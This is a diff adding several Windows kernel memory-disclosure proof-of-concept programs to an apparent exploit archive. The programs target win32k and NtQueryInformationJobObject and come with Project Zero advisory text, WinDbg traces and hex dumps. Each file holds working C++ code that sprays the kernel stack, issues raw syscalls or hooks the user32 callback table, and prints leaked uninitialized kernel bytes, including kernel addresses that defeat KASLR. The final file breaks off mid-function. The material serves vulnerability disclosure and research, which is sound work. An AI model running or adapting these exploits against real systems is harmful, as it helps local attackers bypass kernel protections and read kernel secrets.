// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 7 32-bit.
|
||||||
|
CONST ULONG __NR_NtGdiGetTextMetricsW = 0x10d9;
|
||||||
|
|
||||||
|
// Create a Device Context.
|
||||||
|
HDC hdc = CreateCompatibleDC(NULL);
|
||||||
|
|
||||||
|
// Get a handle to the stock font.
|
||||||
|
HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
|
||||||
|
if (hfont == NULL) {
|
||||||
|
printf("GetCurrentObject failed\n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Select the font into the DC.
|
||||||
|
SelectObject(hdc, hfont);
|
||||||
|
|
||||||
|
// Trigger the vulnerability and dump the kernel output on stdout.
|
||||||
|
BYTE output[0x44] = { /* zero padding */ };
|
||||||
|
if (!SystemCall32(__NR_NtGdiGetTextMetricsW, hdc, output, sizeof(output))) {
|
||||||
|
printf("NtGdiGetTextMetricsW failed\n");
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
PrintHex(output, sizeof(output));
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
136
platforms/windows/dos/42226.cpp
Executable file
136
platforms/windows/dos/42226.cpp
Executable file
|
|
@ -0,0 +1,136 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1181
|
||||||
|
|
||||||
|
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetRealizationInfo system call.
|
||||||
|
|
||||||
|
The concrete layout of the input/output structure is unclear (symbols indicate its name is FONT_REALIZATION_INFO), but the first DWORD field contains the structure size, which can be either 16 or 24. The internal win32k!GreGetRealizationInfo function then initializes a local copy of the structure on the kernel stack with an adequate number of bytes. However, the syscall handler later copies the full 24 bytes of memory back to user-mode, regardless of the declared size of the structure, and the number of bytes initialized within it:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
.text:BF86F307 mov edi, ecx
|
||||||
|
.text:BF86F309
|
||||||
|
.text:BF86F309 loc_BF86F309:
|
||||||
|
.text:BF86F309 push 6
|
||||||
|
.text:BF86F30B pop ecx
|
||||||
|
.text:BF86F30C lea esi, [ebp+var_30]
|
||||||
|
.text:BF86F30F rep movsd
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
In other words, if we pass in a structure with .Size set to 16, the kernel will leak 8 uninitialized stack bytes back to us. This condition is illustrated by the attached proof-of-concept program, which first sprays 1024 bytes of the kernel stack with the 0x41 ('A') value, and then invokes the affected system call. The result of starting the program on Windows 7 32-bit is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 10 00 00 00 03 01 00 00 2d 00 00 00 65 00 00 46 ........-...e..F
|
||||||
|
00000010: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
It is clearly visible that the 8 trailing bytes are set to the leftover 'A's artificially set up to demonstrate the security issue.
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Own implementation of memset(), which guarantees no data is spilled on the local stack.
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Windows 7 32-bit.
|
||||||
|
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
|
||||||
|
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[1024];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 7 32-bit.
|
||||||
|
CONST ULONG __NR_NtGdiGetRealizationInfo = 0x10cb;
|
||||||
|
|
||||||
|
// Create a Device Context.
|
||||||
|
HDC hdc = CreateCompatibleDC(NULL);
|
||||||
|
|
||||||
|
// Create a TrueType font.
|
||||||
|
HFONT hfont = CreateFont(10, // nHeight
|
||||||
|
10, // nWidth
|
||||||
|
0, // nEscapement
|
||||||
|
0, // nOrientation
|
||||||
|
FW_DONTCARE, // fnWeight
|
||||||
|
FALSE, // fdwItalic
|
||||||
|
FALSE, // fdwUnderline
|
||||||
|
FALSE, // fdwStrikeOut
|
||||||
|
ANSI_CHARSET, // fdwCharSet
|
||||||
|
OUT_DEFAULT_PRECIS, // fdwOutputPrecision
|
||||||
|
CLIP_DEFAULT_PRECIS, // fdwClipPrecision
|
||||||
|
DEFAULT_QUALITY, // fdwQuality
|
||||||
|
FF_DONTCARE, // fdwPitchAndFamily
|
||||||
|
L"Times New Roman");
|
||||||
|
|
||||||
|
// Select the font into the DC.
|
||||||
|
SelectObject(hdc, hfont);
|
||||||
|
|
||||||
|
// Spray the kernel stack to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Read the uninitialized kernel stack bytes and print them on screen.
|
||||||
|
DWORD output[6] = { /* zero padding */ };
|
||||||
|
output[0] = 16;
|
||||||
|
|
||||||
|
if (!SystemCall32(__NR_NtGdiGetRealizationInfo, hdc, output)) {
|
||||||
|
printf("NtGdiGetRealizationInfo failed\n");
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
PrintHex((PBYTE)output, sizeof(output));
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
DeleteObject(hfont);
|
||||||
|
DeleteDC(hdc);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
184
platforms/windows/dos/42227.cpp
Executable file
184
platforms/windows/dos/42227.cpp
Executable file
|
|
@ -0,0 +1,184 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1186
|
||||||
|
|
||||||
|
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit.
|
||||||
|
|
||||||
|
The full stack trace of where uninitialized kernel stack data is leaked to user-mode is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
9706b8b4 82ab667d nt!memcpy+0x35
|
||||||
|
9706b910 92bf8220 nt!KeUserModeCallback+0xc6
|
||||||
|
9706b954 92c01d1f win32k!pppUserModeCallback+0x23
|
||||||
|
9706b970 92c096c8 win32k!ClientPrinterThunk+0x41
|
||||||
|
9706ba24 92b0c722 win32k!UMPDDrvEnablePDEV+0x18c
|
||||||
|
9706bc20 92b74bc4 win32k!PDEVOBJ::PDEVOBJ+0x1c5
|
||||||
|
9706bca4 92b6b2a6 win32k!hdcOpenDCW+0x18c
|
||||||
|
9706bd0c 82876db6 win32k!NtGdiOpenDCW+0x112
|
||||||
|
9706bd0c 77486c74 nt!KiSystemServicePostCall
|
||||||
|
0022fa18 772e9978 ntdll!KiFastSystemCallRet
|
||||||
|
0022fa1c 772e9a0e GDI32!NtGdiOpenDCW+0xc
|
||||||
|
0022fca8 772e9bab GDI32!hdcCreateDCW+0x1b1
|
||||||
|
0022fcf4 772e9c5d GDI32!bCreateDCA+0xe4
|
||||||
|
0022fd10 00405114 GDI32!CreateICA+0x18
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
At the time of this callstack, the win32k!ClientPrinterThunk function invokes a user-mode callback #93 (corresponding to user32!__ClientPrinterThunk), and passes in an input structure of 0x6C bytes. We have found that 8 bytes at offset 0x4C and 12 bytes at offset 0x60 of that structure are uninitialized. We have tracked that this structure originates from the stack frame of the win32k!UMPDDrvEnablePDEV function, and is passed down to win32k!UMPDOBJ::Thunk in the 2nd argument.
|
||||||
|
|
||||||
|
The uninitialized data can be obtained by a user-mode application by hooking the appropriate entry in the user32.dll callback dispatch table, and reading data from a pointer provided through the handler's parameter. This technique is illustrated by the attached proof-of-concept code (again, specific to Windows 7 32-bit). If we attach a WinDbg debugger to the tested system, we can set a breakpoint at the beginning of win32k!UMPDDrvEnablePDEV, manually initialize the overall structure copied to user-mode with a marker 0x41 ('A') byte after the stack frame allocation instructions, and then observe some of these bytes in the output of the PoC program. This indicates they were not initialized anywhere during execution between win32k!UMPDDrvEnablePDEV and nt!KeUserModeCallback(), and copied in the leftover form to user-mode. See below:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
1: kd> ba e 1 win32k!UMPDDrvEnablePDEV
|
||||||
|
1: kd> g
|
||||||
|
Breakpoint 0 hit
|
||||||
|
win32k!UMPDDrvEnablePDEV:
|
||||||
|
9629957c 6a7c push 7Ch
|
||||||
|
0: kd> p
|
||||||
|
win32k!UMPDDrvEnablePDEV+0x2:
|
||||||
|
9629957e 68d0633796 push offset win32k!__safe_se_handler_table+0x7c98 (963763d0)
|
||||||
|
0: kd> p
|
||||||
|
win32k!UMPDDrvEnablePDEV+0x7:
|
||||||
|
96299583 e828b4f8ff call win32k!_SEH_prolog4 (962249b0)
|
||||||
|
0: kd> p
|
||||||
|
win32k!UMPDDrvEnablePDEV+0xc:
|
||||||
|
96299588 8d4de4 lea ecx,[ebp-1Ch]
|
||||||
|
0: kd> f ebp-8c ebp-8c+6c-1 41
|
||||||
|
Filled 0x6c bytes
|
||||||
|
0: kd> g
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
After executing the above commands, the program should print output similar to the following:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
[...]
|
||||||
|
00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l...............
|
||||||
|
00000010: 1c 03 11 59 d8 e2 31 00 74 02 c6 01 a8 06 c6 01 ...Y..1.t.......
|
||||||
|
00000020: 06 00 00 00 00 00 c3 01 30 01 00 00 18 00 c3 01 ........0.......
|
||||||
|
00000030: 2c 01 00 00 48 01 c3 01 30 21 a0 ff e4 06 c6 01 ,...H...0!......
|
||||||
|
00000040: 84 9b 31 00 00 00 00 00 00 00 00 00 41 41 41 41 ..1.........AAAA
|
||||||
|
00000050: 41 41 41 41 74 02 c3 01 74 02 c4 01 74 02 c5 01 AAAAt...t...t...
|
||||||
|
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....
|
||||||
|
[...]
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
It's clearly visible that bytes at offsets 0x4c-0x53 and 0x60-0x6b are equal to the data we set in the prologue of win32k!UMPDDrvEnablePDEV, which illustrates how uninitialized stack data is leaked to user-mode.
|
||||||
|
|
||||||
|
If we skip the manual initialization of bytes in the stack frame with a kernel debugger, an example output of the program is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 6c 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 l...............
|
||||||
|
00000010: 75 03 11 55 d8 e2 25 00 74 02 96 01 a8 06 96 01 u..U..%.t.......
|
||||||
|
00000020: 06 00 00 00 00 00 93 01 30 01 00 00 18 00 93 01 ........0.......
|
||||||
|
00000030: 2c 01 00 00 48 01 93 01 30 21 a0 ff e4 06 96 01 ,...H...0!......
|
||||||
|
00000040: 84 9b 25 00 00 00 00 00 00 00 00 00[96 6f 89 82]..%..........o..
|
||||||
|
00000050:[28 65 9d 84]74 02 93 01 74 02 94 01 74 02 95 01 (e..t...t...t...
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
In the above listing, two kernel-mode addresses are leaked at offsets 0x4c and 0x50: an address of the ntoskrnl.exe image, and an address of a non-paged pool allocation:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
0: kd> !address 849d6528
|
||||||
|
[...]
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
Base Address: 84800000
|
||||||
|
End Address: 84a00000
|
||||||
|
Region Size: 00200000
|
||||||
|
VA Type: NonPagedPool
|
||||||
|
VAD Address: 0x8800000067317cf2
|
||||||
|
Commit Charge: 0x1000165643ec0
|
||||||
|
Protection: 0x8800000067317cf0 []
|
||||||
|
Memory Usage: Private
|
||||||
|
No Change: yes
|
||||||
|
More info: !vad 0x84800000
|
||||||
|
0: kd> !address 82896f96
|
||||||
|
|
||||||
|
|
||||||
|
Usage: Module
|
||||||
|
Base Address: 8281c000
|
||||||
|
End Address: 82c38000
|
||||||
|
Region Size: 0041c000
|
||||||
|
VA Type: BootLoaded
|
||||||
|
Module name: ntoskrnl.exe
|
||||||
|
Module path: [\SystemRoot\system32\ntkrnlpa.exe]
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
namespace globals {
|
||||||
|
LPVOID (WINAPI *OrigClientPrinterThunk)(LPVOID);
|
||||||
|
} // namespace globals;
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
PVOID *GetUser32DispatchTable() {
|
||||||
|
__asm{
|
||||||
|
mov eax, fs:30h
|
||||||
|
mov eax, [eax + 0x2c]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
|
||||||
|
PVOID *DispatchTable = GetUser32DispatchTable();
|
||||||
|
DWORD OldProtect;
|
||||||
|
|
||||||
|
if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
|
||||||
|
printf("VirtualProtect#1 failed, %d\n", GetLastError());
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
*lpOrigHandler = DispatchTable[Index];
|
||||||
|
DispatchTable[Index] = lpNewHandler;
|
||||||
|
|
||||||
|
if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
|
||||||
|
printf("VirtualProtect#2 failed, %d\n", GetLastError());
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
|
||||||
|
printf("----------\n");
|
||||||
|
PrintHex((PBYTE)Data, ((PDWORD)Data)[0]);
|
||||||
|
return globals::OrigClientPrinterThunk(Data);
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
HDC hic = CreateICA("Microsoft XPS Document Writer", "Microsoft XPS Document Writer", NULL, NULL);
|
||||||
|
DeleteDC(hic);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
219
platforms/windows/dos/42228.cpp
Executable file
219
platforms/windows/dos/42228.cpp
Executable file
|
|
@ -0,0 +1,219 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1189&desc=2
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the JobObjectExtendedLimitInformation information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
|
||||||
|
|
||||||
|
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a JOBOBJECT_EXTENDED_LIMIT_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the JOBOBJECT_BASIC_LIMIT_INFORMATION structure and the beginning of the adjacent IO_COUNTERS structure. The length of the former is 0x2C (44), while the latter must be 8-byte aligned, so there is a gap at offsets 0x2C-0x2F, which is not initialized by the kernel.
|
||||||
|
|
||||||
|
The vulnerability can be easily demonstrated with a kernel debugger (WinDbg), by setting a breakpoint on nt!NtQueryInformationJobObject, manually filling out the structure memory with a marker byte (0x41), and then observing four of these bytes printed out by the attached proof-of-concept program:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
2: kd> bp nt!NtQueryInformationJobObject
|
||||||
|
2: kd> g
|
||||||
|
Breakpoint 0 hit
|
||||||
|
nt!NtQueryInformationJobObject:
|
||||||
|
818d5891 6890010000 push 190h
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0x5:
|
||||||
|
818d5896 68e0cf6981 push offset nt! ?? ::FNODOBFM::`string'+0x6100 (8169cfe0)
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0xa:
|
||||||
|
818d589b e8b8dbdeff call nt!_SEH_prolog4 (816c3458)
|
||||||
|
3: kd> p
|
||||||
|
nt!NtQueryInformationJobObject+0xf:
|
||||||
|
818d58a0 33f6 xor esi,esi
|
||||||
|
3: kd> f ebp-18c ebp-18c+70-1 41
|
||||||
|
Filled 0x70 bytes
|
||||||
|
3: kd> g
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
An example output on our test virtual machine is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 20 00 00 00 05 00 00 00 41 41 41 41 .... .......AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
|
||||||
|
Upon further investigation of the bug, we have determined the following:
|
||||||
|
|
||||||
|
- Not only the JobObjectExtendedLimitInformation (9), but also the JobObjectBasicLimitInformation (2) information class is affected by the vulnerability. The issue is very similar in that it also leaks 4 uninitialized bytes of kernel stack at offset 0x2C of the output structure. Since both classes are handled by the same or very close code areas, we are treating both cases as the same bug.
|
||||||
|
|
||||||
|
- Windows 10 (contrary to Windows 7) allows the output buffer for JobObjectExtendedLimitInformation to optionally be 120-bytes long instead of the typical 112. In that case, extra 4 kernel stack bytes are leaked at the end of the structure.
|
||||||
|
|
||||||
|
- It is possible to demonstrate the bug without resorting to a kernel debugger, by using the nt!NtMapUserPhysicalPages system call to spray the kernel stack with a large number of controlled bytes, and then invoking the affected nt!NtQueryInformationJobObject syscall directly, instead of through the QueryInformationJobObject() API.
|
||||||
|
|
||||||
|
To address all of the above new facts, I'm attaching a new proof-of-concept program, specific to Windows 10 1607 32-bit, which demonstrates the memory disclosure in all three possible settings: JobObjectBasicLimitInformation (output length 48), JobObjectExtendedLimitInformation (output length 112) and JobObjectExtendedLimitInformation (output length 120). An example output of the program is shown below:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
JobObjectBasicLimitInformation:
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
JobObjectExtendedLimitInformation (112):
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
JobObjectExtendedLimitInformation (120):
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000070: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
|
||||||
|
--- cut ---
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 10 1607 32-bit.
|
||||||
|
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
|
||||||
|
|
||||||
|
// Create a job object to operate on.
|
||||||
|
HANDLE hJob = CreateJobObject(NULL, NULL);
|
||||||
|
|
||||||
|
// Spray the kernel stack with a marker value, to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectBasicLimitInformation).
|
||||||
|
DWORD ReturnLength = 0;
|
||||||
|
BYTE output[120] = { /* zero padding */ };
|
||||||
|
|
||||||
|
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectBasicLimitInformation, &output, sizeof(JOBOBJECT_BASIC_LIMIT_INFORMATION), &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
